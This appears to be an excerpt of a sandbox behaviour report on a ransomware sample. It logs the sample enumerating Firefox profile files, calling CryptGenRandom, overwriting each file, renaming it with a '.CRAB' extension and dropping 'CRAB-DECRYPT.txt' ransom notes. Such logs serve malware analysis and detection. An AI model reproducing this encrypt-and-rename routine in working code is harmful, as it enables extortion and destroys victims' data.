| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, size = 1048576, size_out = 7033 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, size = 7040 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, size = 1048576, size_out = 14906 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, size = 14912 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\saved-telemetry-pings\321b9820-ddf0-4472-8833-27c2104c93fa.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, size = 1048576, size_out = 14056 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, size = 14064 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\search.json.mozlz4.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, size = 1048576, size_out = 16384 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, size = 16384 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\secmod.db.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, size = 1048576, size_out = 288 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, size = 288 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionCheckpoints.json.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, size = 1048576, size_out = 16025 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, size = 16032 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\previous.js.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, size = 1048576, size_out = 16025 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, size = 16032 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore-backups\upgrade.js-20170814072924.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, size = 1048576, size_out = 2007 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, size = 2016 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\sessionstore.js.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, size = 1048576, size_out = 1078 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, size = 1088 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\SiteSecurityServiceState.txt.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, size = 1048576, size_out = 29 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, size = 32 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, size = 1048576, size_out = 42 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, size = 48 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\.metadata-v2.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.files\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, size = 1048576, size_out = 49152 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, size = 49152 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, size = 1048576, size_out = 46 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, size = 48 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
